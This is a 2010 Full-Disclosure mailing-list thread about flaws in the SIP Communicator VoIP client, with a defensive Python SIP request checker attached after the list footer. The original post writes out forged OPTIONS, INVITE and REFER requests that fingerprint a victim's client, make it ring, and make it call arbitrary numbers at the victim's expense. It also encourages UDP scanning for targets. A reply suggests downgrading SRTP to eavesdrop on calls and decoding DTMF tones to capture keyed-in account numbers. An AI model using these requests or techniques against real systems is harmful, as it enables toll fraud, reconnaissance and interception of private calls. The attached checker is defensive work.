Message-ID: <1888475212-1291135113-cardhu_decombobulator_blackberry.rim.net-1665252240-@b25.c3.bise7.blackberry>
Date: Tue, 30 Nov 2010 16:38:38 +0000
From: rappercrazzy@...il.com
To: "stormrider" <strmrdr42@...oo.de>,
full-disclosure-bounces@...ts.grok.org.uk,
full-disclosure@...ts.grok.org.uk
Subject: Re: SIP Communicator - or how to call 18003825968
Try this on Yahoo ;)
Also, an attack I frequently used in conjunction with Ethereal was to MITM and change the RTP headers to allow PCMA/U and block SRTP/ERTP to eavesdrop on the session.
A DTMF decoder can be used to decode the key punches on the phone for 401K :)
Cheers
Joshua
Sent from my BlackBerry® smartphone from !DEA
-----Original Message-----
From: stormrider <strmrdr42@...oo.de>
Sender: full-disclosure-bounces@...ts.grok.org.uk
Date: Mon, 29 Nov 2010 00:57:36
To: <full-disclosure@...ts.grok.org.uk>
Subject: [Full-disclosure] SIP Communicator - or how to call 18003825968
Salve Full-Disclosure!
There is a nice piece of open source software floating around for VoIP
communication, namely "SIP Communicator". For phreakers' phun, the
developers have not taken care of many security aspects when
implementing the SIP protocol.
Now, as I got bored scanning around for open 5060 ports, I decided to
share my findings with you. Nice, eh?
SIP defines a whole bunch of messages to communicate with clients. Some
of the more useful ones for me are OPTIONS and (of course) INVITE, and my
personal favorite is definitely REFER. Funny things can also happen when
using the MESSAGE type.
Short intro to SIP first...
SIP is a protocol mostly used over UDP. It has an HTTP-like look and is
used for Session Initialization of VoIP communication. It is used for
signaling calls and host capabilities (i.e. supported protocols). Many
other things can be done with SIP though. If you're interested, read
http://www.ietf.org/rfc/rfc3261.txt.
Now, for the quick start, SIP defines the OPTIONS message to ask a
client for what is supported and what is not. An OPTIONS request might
look like this (... means truncated for readability):
OPTIONS sip:1234567890@...fu.com SIP/2.0
Via: SIP/2.0/UDP 1.2.3.4;branch=371be296e3d ...
Max-Forwards: 70
To: <sip:1234567890@...fu.com>
From: "A Friend" <sip:133713371337@...fu.com>;tag=70e763707a
Call-ID: 112071fe7c
CSeq: 63104 OPTIONS
Contact: <sip:133713371337@...fu.com>
Accept: application/sdp
Content-Length: 0
This is pretty much self-explanatory. The From line tells who is
requesting the information; the To line says to whom it is sent.
Now, before responding, *good* SIP clients check whether the 'To' line
matches the number that is really registered on the host. Well, *bad*
clients don't :-)
As you might guess, this is where it begins to get phunny... really, this
is the single stupid point that makes a butterfly change the weather...
If you have a client running SIP Communicator you can easily use the
above OPTIONS sample and (no matter what the 'From' or 'To' lines contain)
it will honestly answer your request. It might respond with something
like (... means truncated for readability):
SIP/2.0 200 OK
To: <sip:1234567890@...fu.com>;tag=df7a2b75
Via: SIP/2.0/UDP 1.2.3.4;branch=371be296e3d5d72ee20183d3d146797 ...
CSeq: 63104 OPTIONS
Call-ID: 112071fe7c
From: "A Friend" <sip:133713371337@...fu.com>;tag=70e763707a
Contact: "4461288"
<sip:4461288@....168.1.15:5060;transport=udp;registering_acc=sipgate_de>
User-Agent: SIP Communicator1.0-alpha6-nightly.build.3041Windows 7
Allow: INFO,OPTIONS,MESSAGE,BYE,REFER,ACK,CANCEL,NOTIFY,INVITE ...
Allow-Events: refer
Content-Length: 0
Not that interesting, you might say. But it tells you a lot!
The "User-Agent" tells you that there is "SIP Communicator" running (and
also the version up to the last bit - crazy!). Take a closer look at the
"Contact" line. It tells you the LAN IP of the host, but don't care
about it, it's useless for now. It further tells you the registrar and
the phone number that are registered on the host. In this case it's
"sip:4461288@...gate.de". That's the host's "SIP identity". Keep this in
mind.
Before we start the real phunny things, let's just ring the phone a bit.
All you need to make SIP Communicator ring is an INVITE message. As with
OPTIONS it will react to the message regardless of the 'To' and 'From'
headers. So the following message might just do the job (... means
truncated for readability):
INVITE sip:1337@...fu.com:5060;transport=udp;registering_acc=sn ...
Record-Route: <sip:p1.snafu.com;lr>
Via: SIP/2.0/UDP 127.0.0.1;branch=stupidbranchtag
From: "A Friend" <sip:133713371337@...fu.com>;tag=f5cb6e692d
To: <sip:1234567890@...fu.com>
Contact: <sip:133713371337@...fu.com>
Call-ID: 2f6633739b@...fu.com
CSeq: 102 INVITE
Max-Forwards: 70
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
Supported: replaces
Content-Type: application/sdp
Content-Length: 449
v=0
o=root 23830 23830 IN IP4 98.15.131.42
s=session
c=IN IP4 98.15.131.42
t=0 0
m=audio 35430 RTP/AVP 8 0 3 97 18 112 101
a=rtpmap:8 PCMA/8000
a=rtpmap:0 PCMU/8000
a=rtpmap:3 GSM/8000
a=rtpmap:97 iLBC/8000
a=fmtp:97 mode=30
a=rtpmap:18 G729/8000
a=fmtp:18 annexb=no
a=rtpmap:112 G726-32/8000
a=rtpmap:101 telephone-event/8000
a=fmtp:101 0-16
a=silenceSupp:off - - - -
a=ptime:20
a=sendrecv
a=direction:active
a=nortpproxy:yes
And it turns out, SIP Communicator happily starts ringing just as if
someone was calling.
Ok, that is way phunny, but you know SIP is much more powerful. A very
interesting part of the SIP protocol defines the "REFER" message. That
is some kind of a relay message that tells a host "Please put me through
to XYZ". Again, this is a very useful feature of SIP, but only when the
VoIP software acts carefully when receiving these messages. As mentioned
before, "SIP Communicator" doesn't handle that very restrictively. In
contrast to an INVITE message, "SIP Communicator" needs correct values
for the sip-ID of the host it resides on. So for constructing a valid
REFER request we need the user's sip-ID. Remember the OPTIONS message and
the "Contact" line in its response? We already got the ID! With this
info and some enclosure we can construct a REFER request that lets SIP
Communicator call an arbitrary telephone number. We use the origin's
sip-ID for the REFER and Contact lines and construct a sip-ID from the
phone number to call and the SIP provider of the client in the "Refer-To"
line. We might want to call the number 1-800-FUCKYOU (that is 18003825968):
REFER sip:4461288@...gate.de SIP/2.0
Via: SIP/2.0/UDP 1.2.3.4;branch=31f175a7e2d ...
Max-Forwards: 70
To: <sip:4461288@...gate.de>
From: "A Friend" <sip:133713371337@...fu.com>;tag=ae894a32e8
Call-ID: 5fae3cc039
CSeq: 93809824 REFER
Contact: <sip:4461288@...gate.de>
Refer-To: sip:18003825968@...gate.de
Content-Length: 0
If you then get an answer that says "SIP/2.0 202 Accepted", you got it.
- PLEASE - be advised that calling a number from someone's SIP phone
might generate costs on his bill. If the user using SIP Communicator has
a prepaid account, it might not even work if you try to call someone on
the landline and there is not enough money available to make that call.
Be nice and don't spend other people's money!!
There are not many SIP Communicator installations around that are
reachable over the internet, so you can hardly find any hosts to attack.
Instead you may find many other products responding to probes, but as far
as I can tell they are all much better protected.
Anyway, scanning for vulnerable hosts is an easy task because we're
using UDP. No three-way handshake or other nasty things. Just send and forget.
Maybe it is just the right time to dive deeper into SIP and VoIP things.
New applications come out each day, the industry around that sector
grows and grows and SS7 and companions are still underdeveloped.
keep on phrocking,
stormrider
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
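As an added example (not code from the post, and not SIP Communicator's own code), here is a small Python request parser with the two checks the post contrasts: the 'To' check that *good* clients make before answering OPTIONS or INVITE, and, because the post's REFER already carries the right sip-ID and so would pass that check, a second policy that only honours REFER inside an established call. The registered identity, hosts and Call-IDs are constructed placeholders modelled on the post's messages.

```python
import re

# Constructed samples modelled on the post's messages; hosts are placeholders.
REGISTERED_AOR = "sip:4461288@registrar.example"   # assumed registered identity
PROBE_OPTIONS = (
    "OPTIONS sip:1234567890@snafu.example SIP/2.0\r\n"
    "To: <sip:1234567890@snafu.example>\r\n"
    "From: \"A Friend\" <sip:133713371337@snafu.example>;tag=70e763707a\r\n"
    "Call-ID: 112071fe7c\r\nCSeq: 63104 OPTIONS\r\nContent-Length: 0\r\n\r\n")
FORGED_REFER = (
    "REFER sip:4461288@registrar.example SIP/2.0\r\n"
    "To: <sip:4461288@registrar.example>\r\n"
    "From: \"A Friend\" <sip:133713371337@snafu.example>;tag=ae894a32e8\r\n"
    "Call-ID: 5fae3cc039\r\nCSeq: 93809824 REFER\r\n"
    "Refer-To: sip:18003825968@registrar.example\r\nContent-Length: 0\r\n\r\n")

def parse_request(raw):
    """Return (method, request_uri, {lower-cased name: [values]})."""
    lines = raw.replace("\r\n", "\n").strip("\n").split("\n")
    m = re.match(r"^([A-Z]+)\s+(\S+)\s+SIP/2\.0$", lines[0])
    if not m:
        raise ValueError("not a SIP request line: %r" % lines[0])
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break                      # blank line ends the header section
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return m.group(1), m.group(2), headers

def uri_aor(header_value):
    """Bare sip:user@host of a To/From/Contact value (no name/port/params)."""
    m = re.search(r"(sips?:[^@\s<>;]+@[^:;>\s]+)", header_value)
    return m.group(1) if m else None

def decide(raw, registered_aor=REGISTERED_AOR, active_call_ids=()):
    """Checks a *good* client makes before reacting; returns the SIP status."""
    method, _ruri, h = parse_request(raw)
    # The 'To' header must name the identity actually registered here.
    if uri_aor(h.get("to", [""])[0]) != registered_aor:
        return "403 Forbidden (To does not match registered identity)"
    if method == "REFER":
        # A matching 'To' alone does not stop the post's REFER, which already
        # carries the right sip-ID: only honour REFER inside a call we have.
        if h.get("call-id", [""])[0] not in active_call_ids:
            return "403 Forbidden (REFER outside an established dialog)"
        if "refer-to" not in h:
            return "400 Bad Request (missing Refer-To)"
        return "202 Accepted"
    return "200 OK"
```

The in-dialog requirement for REFER is a policy choice assumed here (the specification permits out-of-dialog REFER), which is why it is expressed as a separate check rather than folded into the 'To' comparison.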